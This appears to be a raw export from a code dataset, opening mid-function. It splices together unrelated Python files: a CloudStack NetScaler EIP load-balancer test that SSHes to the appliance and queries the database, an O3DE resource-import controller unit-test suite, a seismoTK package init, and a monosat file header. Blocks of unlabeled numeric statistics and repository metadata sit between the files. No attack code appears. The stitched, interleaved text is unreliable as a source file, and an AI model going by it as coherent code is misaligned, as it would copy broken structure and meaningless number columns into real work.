self.lb_rule.delete(self.apiclient)
time.sleep(60)
self.debug("SSH into netscaler: %s" %
self.services["netscaler"]["ipaddress"])
ssh_client = SshClient(
self.services["netscaler"]["ipaddress"],
22,
self.services["netscaler"]["username"],
self.services["netscaler"]["password"],
)
self.debug("command: show ip")
res = ssh_client.execute("show ip")
result = str(res)
self.debug("Output: %s" % result)
self.assertEqual(
result.count(lb_ip.ipaddress),
1,
"One IP from EIP pool should be taken and configured on NS"
)
self.debug("Command:show lb vserver")
res = ssh_client.execute("show lb vserver")
result = str(res)
self.debug("Output: %s" % result)
self.assertEqual(
result.count(
"Cloud-VirtualServer-%s-22 (%s:22) - TCP" %
(lb_ip.ipaddress,
lb_ip.ipaddress)),
1,
"User subnet IP should be enabled for LB service")
return
@attr(tags=["eip"])
def test_04_delete_lb_on_eip(self):
"""Test delete LB rule generated on EIP
"""
# Validate the following
# 1. Deleting LB rule won't release EIP where is_system=0
# 2. disassociateIP must release the above IP
# 3. check configuration changes for EIP reflects on NS
# commands to verify on NS :
# * "show ip"
# * "show lb vserer"-make sure that output says they are all up and
# running and USNIP : ON
# Fetch details from account_id table in database
self.debug(
"select id from account where account_name='%s';"
% self.account.name)
qresultset = self.dbclient.execute(
"select id from account where account_name='%s';"
% self.account.name)
self.assertEqual(
isinstance(qresultset, list),
True,
"Check DB query result set for valid data"
)
self.assertNotEqual(
len(qresultset),
0,
"DB query should return a valid public IP address"
)
qresult = qresultset[0]
account_id = qresult[0]
# Fetch details from user_ip_address table in database
self.debug(
"select public_ip_address from user_ip_address where\
is_system=0 and account_id=%s;" %
account_id)
qresultset = self.dbclient.execute(
"select public_ip_address from user_ip_address where\
is_system=0 and account_id=%s;" %
account_id)
self.assertEqual(
isinstance(qresultset, list),
True,
"Check DB query result set for valid data"
)
self.assertNotEqual(
len(qresultset),
0,
"DB query should return a valid public IP address"
)
qresult = qresultset[0]
public_ip = qresult[0]
self.debug(
"Fetching public IP for account: %s" % self.account.name)
ip_addrs = PublicIPAddress.list(
self.api_client,
ipaddress=public_ip,
listall=True
)
self.debug("ip address list: %s" % ip_addrs)
self.assertEqual(
isinstance(ip_addrs, list),
True,
"List Public IP address should return valid IP address for network"
)
lb_ip = ip_addrs[0]
lb_rules = LoadBalancerRule.list(
self.apiclient,
publicipid=lb_ip.id,
listall=True
)
self.assertEqual(
isinstance(lb_rules, list),
True,
"Atleast one LB rule must be present for public IP address"
)
lb_rule = lb_rules[0]
self.debug("Deleting LB rule associated with IP: %s" % public_ip)
try:
cmd = deleteLoadBalancerRule.deleteLoadBalancerRuleCmd()
cmd.id = lb_rule.id
self.apiclient.deleteLoadBalancerRule(cmd)
except Exception as e:
self.fail("Deleting LB rule failed for IP: %s-%s" % (public_ip, e))
# TODO:check the lb rule list and then confirm that lb rule is deleted
self.debug("LB rule deleted!")
ip_addrs = PublicIPAddress.list(
self.api_client,
ipaddress=public_ip,
listall=True
)
self.assertEqual(
isinstance(ip_addrs, list),
True,
"Deleting LB rule should not delete public IP"
)
self.debug("SSH into netscaler: %s" %
self.services["netscaler"]["ipaddress"])
try:
ssh_client = SshClient(
self.services["netscaler"]["ipaddress"],
22,
self.services["netscaler"]["username"],
self.services["netscaler"]["password"],
)
self.debug("command: show ip")
res = ssh_client.execute("show ip")
result = str(res)
self.debug("Output: %s" % result)
self.assertNotEqual(
result.count(public_ip),
1,
"One IP from EIP pool should be taken and configured on NS"
)
self.debug("Command:show lb vserver")
res = ssh_client.execute("show lb vserver")
result = str(res)
self.debug("Output: %s" % result)
self.assertNotEqual(
result.count(
"Cloud-VirtualServer-%s-22 (%s:22) - TCP" %
(lb_ip.ipaddress,
lb_ip.ipaddress)),
1,
"User subnet IP should be enabled for LB service")
except Exception as e:
self.fail("SSH Access failed for %s: %s" %
(self.services["netscaler"]["ipaddress"], e))
return
| 33.99419
| 88
| 0.539074
| 5,599
| 52,657
| 4.956957
| 0.0818
| 0.032752
| 0.02342
| 0.019601
| 0.823017
| 0.802443
| 0.781473
| 0.765763
| 0.750847
| 0.7342
| 0
| 0.009142
| 0.370568
| 52,657
| 1,548
| 89
| 34.01615
| 0.828234
| 0.186205
| 0
| 0.756206
| 0
| 0
| 0.178686
| 0.008362
| 0
| 0
| 0
| 0.001938
| 0.06383
| 1
| 0.015957
| false
| 0.010638
| 0.007979
| 0
| 0.041667
| 0.000887
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1cefa8833fea565b264536529bf478b9d59d191b
| 27,669
|
py
|
Python
|
Gems/AWSCore/Code/Tools/ResourceMappingTool/tests/unit/controller/test_import_resources_controller.py
|
cypherdotXd/o3de
|
bb90c4ddfe2d495e9c00ebf1e2650c6d603a5676
|
[
"Apache-2.0",
"MIT"
] | 11
|
2021-07-08T09:58:26.000Z
|
2022-03-17T17:59:26.000Z
|
Gems/AWSCore/Code/Tools/ResourceMappingTool/tests/unit/controller/test_import_resources_controller.py
|
RoddieKieley/o3de
|
e804fd2a4241b039a42d9fa54eaae17dc94a7a92
|
[
"Apache-2.0",
"MIT"
] | 29
|
2021-07-06T19:33:52.000Z
|
2022-03-22T10:27:49.000Z
|
Gems/AWSCore/Code/Tools/ResourceMappingTool/tests/unit/controller/test_import_resources_controller.py
|
RoddieKieley/o3de
|
e804fd2a4241b039a42d9fa54eaae17dc94a7a92
|
[
"Apache-2.0",
"MIT"
] | 4
|
2021-07-06T19:24:43.000Z
|
2022-03-31T12:42:27.000Z
|
"""
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
"""
from typing import List
from unittest import TestCase
from unittest.mock import (call, MagicMock, patch)
from controller.import_resources_controller import ImportResourcesController
from model import constants
from model.basic_resource_attributes import (BasicResourceAttributes, BasicResourceAttributesBuilder)
from view.import_resources_page import ImportResourcesPageConstants
class TestImportResourcesController(TestCase):
"""
ImportResourcesController unit test cases
TODO: add test cases once error handling is ready
"""
_expected_account_id: str = "1234567890"
_expected_region: str = "aws-global"
_expected_lambda_name: str = "TestLambda"
_expected_lambda_resource: BasicResourceAttributes = BasicResourceAttributesBuilder() \
.build_type(constants.AWS_RESOURCE_TYPES[constants.AWS_RESOURCE_LAMBDA_FUNCTION_INDEX]) \
.build_name_id(_expected_lambda_name) \
.build_region(_expected_region) \
.build_account_id(_expected_account_id) \
.build()
_expected_cfn_stack_name: str = "TestStack"
_expected_cfn_stack_resource: BasicResourceAttributes = BasicResourceAttributesBuilder() \
.build_type(constants.AWS_RESOURCE_CLOUDFORMATION_STACK_TYPE) \
.build_name_id(_expected_cfn_stack_name) \
.build_account_id(_expected_account_id) \
.build_region(_expected_region) \
.build()
def setUp(self) -> None:
configuration_manager_patcher: patch = patch("controller.import_resources_controller.ConfigurationManager")
self.addCleanup(configuration_manager_patcher.stop)
self._mock_configuration_manager: MagicMock = configuration_manager_patcher.start()
view_manager_patcher: patch = patch("controller.import_resources_controller.ViewManager")
self.addCleanup(view_manager_patcher.stop)
self._mock_view_manager: MagicMock = view_manager_patcher.start()
self._mocked_configuration_manager: MagicMock = self._mock_configuration_manager.get_instance.return_value
self._mocked_configuration_manager.configuration.account_id = TestImportResourcesController._expected_account_id
self._mocked_configuration_manager.configuration.region = TestImportResourcesController._expected_region
self._mocked_view_manager: MagicMock = self._mock_view_manager.get_instance.return_value
self._mocked_import_resources_page: MagicMock = self._mocked_view_manager.get_import_resources_page.return_value
self._mocked_tree_view: MagicMock = self._mocked_import_resources_page.tree_view
self._mocked_proxy_model: MagicMock = self._mocked_tree_view.resource_proxy_model
self._test_import_resources_controller: ImportResourcesController = ImportResourcesController()
self._test_import_resources_controller.add_import_resources_sender = MagicMock()
self._test_import_resources_controller.set_notification_frame_text_sender = MagicMock()
self._test_import_resources_controller.setup()
def test_reset_page_resetting_page_with_expected_state(self) -> None:
self._test_import_resources_controller.reset_page()
self._mocked_tree_view.reset_view.assert_called_once()
self._mocked_import_resources_page.set_current_main_view_index.assert_called_once_with(
ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)
self._mocked_import_resources_page.typed_resources_combobox.setCurrentIndex.assert_called_once_with(-1)
assert self._mocked_import_resources_page.search_version is None
def test_setup_with_behavior_connected(self) -> None:
self._mocked_import_resources_page.back_button.clicked.connect.assert_called_once_with(
self._test_import_resources_controller._back_to_view_edit_page)
self._mocked_import_resources_page.search_filter_input.returnPressed.connect.assert_called_once_with(
self._test_import_resources_controller._filter_based_on_search_text)
self._mocked_import_resources_page.typed_resources_search_button.clicked.connect.assert_called_once_with(
self._test_import_resources_controller._start_search_resources_async)
self._mocked_import_resources_page.typed_resources_import_button.clicked.connect.assert_called_once_with(
self._test_import_resources_controller._import_resources)
self._mocked_import_resources_page.cfn_stacks_search_button.clicked.connect.assert_called_once_with(
self._test_import_resources_controller._start_search_resources_async)
self._mocked_import_resources_page.cfn_stacks_import_button.clicked.connect.assert_called_once_with(
self._test_import_resources_controller._import_resources)
def test_page_back_button_switching_view_gets_invoked_and_resetting_page_with_expected_state(self) -> None:
mocked_call_args: call = \
self._mocked_import_resources_page.back_button.clicked.connect.call_args[0]
mocked_call_args[0]() # triggering back_button connected function
self._mocked_view_manager.switch_to_view_edit_page.assert_called_once()
self._mocked_tree_view.reset_view.assert_called_once()
self._mocked_import_resources_page.set_current_main_view_index.assert_called_once_with(
ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)
self._mocked_import_resources_page.typed_resources_combobox.setCurrentIndex.assert_called_once_with(-1)
assert self._mocked_import_resources_page.search_version is None
def test_page_search_filter_input_invoke_proxy_model_with_expected_filter_text(self) -> None:
expected_filter_text: str = "dummySearchFilter"
self._mocked_import_resources_page.search_filter_input.text.return_value = expected_filter_text
mocked_call_args: call = \
self._mocked_import_resources_page.search_filter_input.returnPressed.connect.call_args[0]
mocked_call_args[0]() # triggering search_filter_input connected function
self._mocked_tree_view.clear_selection()
assert self._mocked_proxy_model.filter_text == expected_filter_text
def test_page_search_button_post_notification_when_search_version_is_unexpected(self) -> None:
self._mocked_import_resources_page.search_version = "dummySearchVersion"
mocked_call_args: call = \
self._mocked_import_resources_page.typed_resources_search_button.clicked.connect.call_args[0]
mocked_call_args[0]() # triggering search_button connected function
self._test_import_resources_controller.set_notification_frame_text_sender.emit.assert_called_once()
self._mocked_tree_view.reset_view.assert_not_called()
self._mocked_import_resources_page.set_current_main_view_index.assert_not_called()
@patch("controller.import_resources_controller.ThreadManager")
def test_page_cfn_stacks_search_button_switch_page_with_expected_index_in_sync_process(
self, mock_thread_manager: MagicMock) -> None:
self._mocked_import_resources_page.search_version = constants.SEARCH_CFN_STACKS_VERSION
mocked_call_args: call = \
self._mocked_import_resources_page.cfn_stacks_search_button.clicked.connect.call_args[0]
mocked_call_args[0]() # triggering cfn_stacks_search_button connected function
self._mocked_tree_view.reset_view.assert_called_once()
self._mocked_import_resources_page.set_current_main_view_index.assert_called_once_with(
ImportResourcesPageConstants.NOTIFICATION_PAGE_INDEX)
mock_thread_manager.get_instance.return_value.start.assert_called_once()
@patch("controller.import_resources_controller.ThreadManager")
@patch("controller.import_resources_controller.aws_utils")
def test_page_cfn_stacks_search_button_no_resource_loaded_when_search_cfn_stacks_returns_empty_in_async_process(
self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
self._mocked_import_resources_page.search_version = constants.SEARCH_CFN_STACKS_VERSION
mocked_call_args: call = \
self._mocked_import_resources_page.cfn_stacks_search_button.clicked.connect.call_args[0]
mocked_call_args[0]() # triggering cfn_stacks_search_button connected function
mock_thread_manager.get_instance.return_value.start.assert_called_once()
mock_aws_utils.list_cloudformation_stacks.return_value = []
mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
mocked_async_call_args[0].run() # triggering async function
mock_aws_utils.list_cloudformation_stacks.assert_called_once_with(
TestImportResourcesController._expected_region)
mock_aws_utils.list_cloudformation_stack_resources.assert_not_called()
self._mocked_proxy_model.load_resource.assert_not_called()
self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)
@patch("controller.import_resources_controller.ThreadManager")
@patch("controller.import_resources_controller.aws_utils")
def test_page_cfn_stacks_search_button_post_notification_when_search_cfn_stacks_raise_exception_in_async_process(
self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
self._mocked_import_resources_page.search_version = constants.SEARCH_CFN_STACKS_VERSION
mocked_call_args: call = \
self._mocked_import_resources_page.cfn_stacks_search_button.clicked.connect.call_args[0]
mocked_call_args[0]() # triggering cfn_stacks_search_button connected function
mock_thread_manager.get_instance.return_value.start.assert_called_once()
mock_aws_utils.list_cloudformation_stacks.side_effect = RuntimeError("dummyException")
mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
mocked_async_call_args[0].run() # triggering async function
mock_aws_utils.list_cloudformation_stacks.assert_called_once_with(
TestImportResourcesController._expected_region)
mock_aws_utils.list_cloudformation_stack_resources.assert_not_called()
self._test_import_resources_controller.set_notification_frame_text_sender.emit.assert_called_once()
self._mocked_proxy_model.load_resource.assert_not_called()
self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)
@patch("controller.import_resources_controller.ThreadManager")
@patch("controller.import_resources_controller.aws_utils")
def test_page_cfn_stacks_search_button_post_notification_when_search_cfn_resources_raise_exception_in_async_process(
self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
self._mocked_import_resources_page.search_version = constants.SEARCH_CFN_STACKS_VERSION
mocked_call_args: call = \
self._mocked_import_resources_page.cfn_stacks_search_button.clicked.connect.call_args[0]
mocked_call_args[0]() # triggering cfn_stacks_search_button connected function
mock_thread_manager.get_instance.return_value.start.assert_called_once()
mock_aws_utils.list_cloudformation_stacks.return_value = \
[TestImportResourcesController._expected_cfn_stack_name]
mock_aws_utils.list_cloudformation_stack_resources.side_effect = RuntimeError("dummyException")
mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
mocked_async_call_args[0].run() # triggering async function
mock_aws_utils.list_cloudformation_stacks.assert_called_once_with(
TestImportResourcesController._expected_region)
mock_aws_utils.list_cloudformation_stack_resources.assert_called_once_with(
TestImportResourcesController._expected_cfn_stack_name, TestImportResourcesController._expected_region)
self._test_import_resources_controller.set_notification_frame_text_sender.emit.assert_called_once()
self._mocked_proxy_model.load_resource.assert_not_called()
self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)
@patch("controller.import_resources_controller.ThreadManager")
@patch("controller.import_resources_controller.aws_utils")
def test_page_cfn_stacks_search_button_no_resource_loaded_when_no_resource_found_under_cfn_stack_in_async_process(
self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
self._mocked_import_resources_page.search_version = constants.SEARCH_CFN_STACKS_VERSION
mocked_call_args: call = \
self._mocked_import_resources_page.cfn_stacks_search_button.clicked.connect.call_args[0]
mocked_call_args[0]() # triggering cfn_stacks_search_button connected function
mock_thread_manager.get_instance.return_value.start.assert_called_once()
mock_aws_utils.list_cloudformation_stacks.return_value = \
[TestImportResourcesController._expected_cfn_stack_name]
mock_aws_utils.list_cloudformation_stack_resources.return_value = []
mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
mocked_async_call_args[0].run() # triggering async function
mock_aws_utils.list_cloudformation_stacks.assert_called_once_with(
TestImportResourcesController._expected_region)
mock_aws_utils.list_cloudformation_stack_resources.assert_called_once_with(
TestImportResourcesController._expected_cfn_stack_name, TestImportResourcesController._expected_region)
self._mocked_proxy_model.load_resource.assert_not_called()
self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)
@patch("controller.import_resources_controller.ThreadManager")
@patch("controller.import_resources_controller.aws_utils")
def test_page_cfn_stacks_search_button_expected_resource_loaded_when_resource_found_under_cfn_stack_in_async_process(
self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
self._mocked_import_resources_page.search_version = constants.SEARCH_CFN_STACKS_VERSION
mocked_call_args: call = \
self._mocked_import_resources_page.cfn_stacks_search_button.clicked.connect.call_args[0]
mocked_call_args[0]() # triggering cfn_stacks_search_button connected function
mock_thread_manager.get_instance.return_value.start.assert_called_once()
mock_aws_utils.list_cloudformation_stacks.return_value = \
[TestImportResourcesController._expected_cfn_stack_name]
mock_aws_utils.list_cloudformation_stack_resources.return_value = \
[TestImportResourcesController._expected_lambda_resource]
mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
mocked_async_call_args[0].run() # triggering async function
mock_aws_utils.list_cloudformation_stacks.assert_called_once_with(
TestImportResourcesController._expected_region)
mock_aws_utils.list_cloudformation_stack_resources.assert_called_once_with(
TestImportResourcesController._expected_cfn_stack_name, TestImportResourcesController._expected_region)
expected_mocked_calls: List[call] = [call(TestImportResourcesController._expected_cfn_stack_resource),
call(TestImportResourcesController._expected_lambda_resource)]
self._mocked_proxy_model.load_resource.assert_has_calls(expected_mocked_calls)
self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)
def test_page_cfn_stacks_import_button_nothing_happened_when_selected_resources_are_empty(self) -> None:
self._mocked_proxy_model.deduplicate_selected_import_resources.return_value = []
mocked_call_args: call = \
self._mocked_import_resources_page.cfn_stacks_import_button.clicked.connect.call_args[0]
mocked_call_args[0]() # triggering cfn_stacks_import_button connected function
self._test_import_resources_controller.add_import_resources_sender.emit.assert_not_called()
self._test_import_resources_controller.set_notification_frame_text_sender.emit.assert_called_once()
def test_page_cfn_stacks_import_button_emit_signal_with_expected_resources_and_switch_to_expected_page(self) -> None:
self._mocked_proxy_model.deduplicate_selected_import_resources.return_value = \
[TestImportResourcesController._expected_lambda_resource]
mocked_call_args: call = \
self._mocked_import_resources_page.cfn_stacks_import_button.clicked.connect.call_args[0]
mocked_call_args[0]() # triggering cfn_stacks_import_button connected function
self._test_import_resources_controller.add_import_resources_sender.emit.assert_called_once_with(
[TestImportResourcesController._expected_lambda_resource])
self._mocked_view_manager.switch_to_view_edit_page.assert_called_once()
self._mocked_tree_view.reset_view.assert_called_once()
self._mocked_import_resources_page.set_current_main_view_index.assert_called_once_with(
ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)
self._mocked_import_resources_page.typed_resources_combobox.setCurrentIndex.assert_called_once_with(-1)
assert self._mocked_import_resources_page.search_version is None
@patch("controller.import_resources_controller.ThreadManager")
def test_page_typed_resources_search_button_switch_page_with_expected_index_in_sync_process(
self, mock_thread_manager: MagicMock) -> None:
self._mocked_import_resources_page.search_version = constants.SEARCH_TYPED_RESOURCES_VERSION
mocked_call_args: call = \
self._mocked_import_resources_page.typed_resources_search_button.clicked.connect.call_args[0]
mocked_call_args[0]() # triggering typed_resources_search_button connected function
self._mocked_tree_view.reset_view.assert_called_once()
self._mocked_import_resources_page.set_current_main_view_index.assert_called_once_with(
ImportResourcesPageConstants.NOTIFICATION_PAGE_INDEX)
mock_thread_manager.get_instance.return_value.start.assert_called_once()
@patch("controller.import_resources_controller.ThreadManager")
@patch("controller.import_resources_controller.aws_utils")
def test_page_typed_resources_search_button_no_resource_loaded_when_search_lambda_returns_empty_in_async_process(
self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
self._mocked_import_resources_page.search_version = constants.SEARCH_TYPED_RESOURCES_VERSION
mocked_call_args: call = \
self._mocked_import_resources_page.typed_resources_search_button.clicked.connect.call_args[0]
mocked_call_args[0]() # triggering typed_resources_search_button connected function
mock_thread_manager.get_instance.return_value.start.assert_called_once()
self._mocked_import_resources_page.typed_resources_combobox.currentIndex.return_value = \
constants.AWS_RESOURCE_LAMBDA_FUNCTION_INDEX
mock_aws_utils.list_lambda_functions.return_value = []
mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
mocked_async_call_args[0].run() # triggering async function
mock_aws_utils.list_lambda_functions.assert_called_once_with(
TestImportResourcesController._expected_region)
self._mocked_proxy_model.load_resource.assert_not_called()
self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)
@patch("controller.import_resources_controller.ThreadManager")
@patch("controller.import_resources_controller.aws_utils")
def test_page_typed_resources_search_button_no_resource_loaded_when_search_lambda_raise_exception_in_async_process(
self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
self._mocked_import_resources_page.search_version = constants.SEARCH_TYPED_RESOURCES_VERSION
mocked_call_args: call = \
self._mocked_import_resources_page.typed_resources_search_button.clicked.connect.call_args[0]
mocked_call_args[0]() # triggering typed_resources_search_button connected function
mock_thread_manager.get_instance.return_value.start.assert_called_once()
self._mocked_import_resources_page.typed_resources_combobox.currentIndex.return_value = \
constants.AWS_RESOURCE_LAMBDA_FUNCTION_INDEX
mock_aws_utils.list_lambda_functions.side_effect = RuntimeError("dummyException")
mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
mocked_async_call_args[0].run() # triggering async function
mock_aws_utils.list_lambda_functions.assert_called_once_with(
TestImportResourcesController._expected_region)
self._test_import_resources_controller.set_notification_frame_text_sender.emit.assert_called_once()
self._mocked_proxy_model.load_resource.assert_not_called()
self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)
@patch("controller.import_resources_controller.ThreadManager")
@patch("controller.import_resources_controller.aws_utils")
def test_page_typed_resources_search_button_no_resource_loaded_when_resource_type_is_unexpected_in_async_process(
self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
self._mocked_import_resources_page.search_version = constants.SEARCH_TYPED_RESOURCES_VERSION
mocked_call_args: call = \
self._mocked_import_resources_page.typed_resources_search_button.clicked.connect.call_args[0]
mocked_call_args[0]() # triggering typed_resources_search_button connected function
mock_thread_manager.get_instance.return_value.start.assert_called_once()
self._mocked_import_resources_page.typed_resources_combobox.currentIndex.return_value = -1
mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
mocked_async_call_args[0].run() # triggering async function
self._test_import_resources_controller.set_notification_frame_text_sender.emit.assert_called_once()
self._mocked_proxy_model.load_resource.assert_not_called()
self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)
@patch("controller.import_resources_controller.ThreadManager")
@patch("controller.import_resources_controller.aws_utils")
def test_page_typed_resources_search_button_expected_resource_loaded_when_found_lambda_in_async_process(
self, mock_aws_utils: MagicMock, mock_thread_manager: MagicMock) -> None:
self._mocked_import_resources_page.search_version = constants.SEARCH_TYPED_RESOURCES_VERSION
mocked_call_args: call = \
self._mocked_import_resources_page.typed_resources_search_button.clicked.connect.call_args[0]
mocked_call_args[0]() # triggering typed_resources_search_button connected function
mock_thread_manager.get_instance.return_value.start.assert_called_once()
self._mocked_import_resources_page.typed_resources_combobox.currentIndex.return_value = \
constants.AWS_RESOURCE_LAMBDA_FUNCTION_INDEX
mock_aws_utils.list_lambda_functions.return_value = [TestImportResourcesController._expected_lambda_name]
mocked_async_call_args: call = mock_thread_manager.get_instance.return_value.start.call_args[0]
mocked_async_call_args[0].run() # triggering async function
mock_aws_utils.list_lambda_functions.assert_called_once_with(
TestImportResourcesController._expected_region)
self._mocked_proxy_model.load_resource.assert_called_once_with(
TestImportResourcesController._expected_lambda_resource)
self._mocked_proxy_model.emit_source_model_layout_changed.assert_called_once()
self._mocked_import_resources_page.set_current_main_view_index.assert_called_with(
ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)
def test_page_typed_resources_import_button_nothing_happened_when_selected_resources_are_empty(self) -> None:
self._mocked_proxy_model.deduplicate_selected_import_resources.return_value = []
mocked_call_args: call = \
self._mocked_import_resources_page.typed_resources_import_button.clicked.connect.call_args[0]
mocked_call_args[0]() # triggering typed_resources_import_button connected function
self._test_import_resources_controller.add_import_resources_sender.emit.assert_not_called()
self._test_import_resources_controller.set_notification_frame_text_sender.emit.assert_called_once()
def test_page_typed_resources_import_button_emit_signal_with_expected_resources_and_switch_to_expected_page(self) -> None:
self._mocked_proxy_model.deduplicate_selected_import_resources.return_value = \
[TestImportResourcesController._expected_lambda_resource]
mocked_call_args: call = \
self._mocked_import_resources_page.typed_resources_import_button.clicked.connect.call_args[0]
mocked_call_args[0]() # triggering typed_resources_import_button connected function
self._test_import_resources_controller.add_import_resources_sender.emit.assert_called_once_with(
[TestImportResourcesController._expected_lambda_resource])
self._mocked_view_manager.switch_to_view_edit_page.assert_called_once()
self._mocked_tree_view.reset_view.assert_called_once()
self._mocked_import_resources_page.set_current_main_view_index.assert_called_once_with(
ImportResourcesPageConstants.TREE_VIEW_PAGE_INDEX)
self._mocked_import_resources_page.typed_resources_combobox.setCurrentIndex.assert_called_once_with(-1)
assert self._mocked_import_resources_page.search_version is None
| 69
| 126
| 0.805306
| 3,359
| 27,669
| 6.023519
| 0.054778
| 0.09267
| 0.064795
| 0.082786
| 0.899521
| 0.878762
| 0.870657
| 0.851777
| 0.82573
| 0.811545
| 0
| 0.003012
| 0.136109
| 27,669
| 400
| 127
| 69.1725
| 0.843451
| 0.055007
| 0
| 0.741176
| 0
| 0
| 0.047099
| 0.042653
| 0
| 0
| 0
| 0.0025
| 0.276471
| 1
| 0.061765
| false
| 0
| 0.491176
| 0
| 0.573529
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
1cf8de58674a7520d41acc340c2fad3206e72036
| 159
|
py
|
Python
|
seismoTK/__init__.py
|
GilbertoAquino/seismoTK
|
41cfef1a1c145613d6ce1539635391855338b97f
|
[
"MIT"
] | null | null | null |
seismoTK/__init__.py
|
GilbertoAquino/seismoTK
|
41cfef1a1c145613d6ce1539635391855338b97f
|
[
"MIT"
] | null | null | null |
seismoTK/__init__.py
|
GilbertoAquino/seismoTK
|
41cfef1a1c145613d6ce1539635391855338b97f
|
[
"MIT"
] | null | null | null |
from seismoTK.RACM import RACM
from seismoTK.Polarization import Polarization
from seismoTK.Polarization import read_pol
from seismoTK.S_Filter import S_Filter
| 39.75
| 46
| 0.880503
| 23
| 159
| 5.956522
| 0.391304
| 0.350365
| 0.350365
| 0.437956
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09434
| 159
| 4
| 47
| 39.75
| 0.951389
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e8066be15a41ac1c8ae9ffc6bd092451431c786e
| 59,307
|
py
|
Python
|
src/monosat/api/python/monosat/pbtheory.py
|
yasoob/monosat
|
8a210240191e99807700188537f89177e150de4a
|
[
"MIT"
] | null | null | null |
src/monosat/api/python/monosat/pbtheory.py
|
yasoob/monosat
|
8a210240191e99807700188537f89177e150de4a
|
[
"MIT"
] | null | null | null |
src/monosat/api/python/monosat/pbtheory.py
|
yasoob/monosat
|
8a210240191e99807700188537f89177e150de4a
|
[
"MIT"
] | null | null | null |
# The MIT License (MIT)
#
# Copyright (c) 2014, Sam Bayless
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT
# OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
import shutil
import sys
import time
import monosat.monosat_c
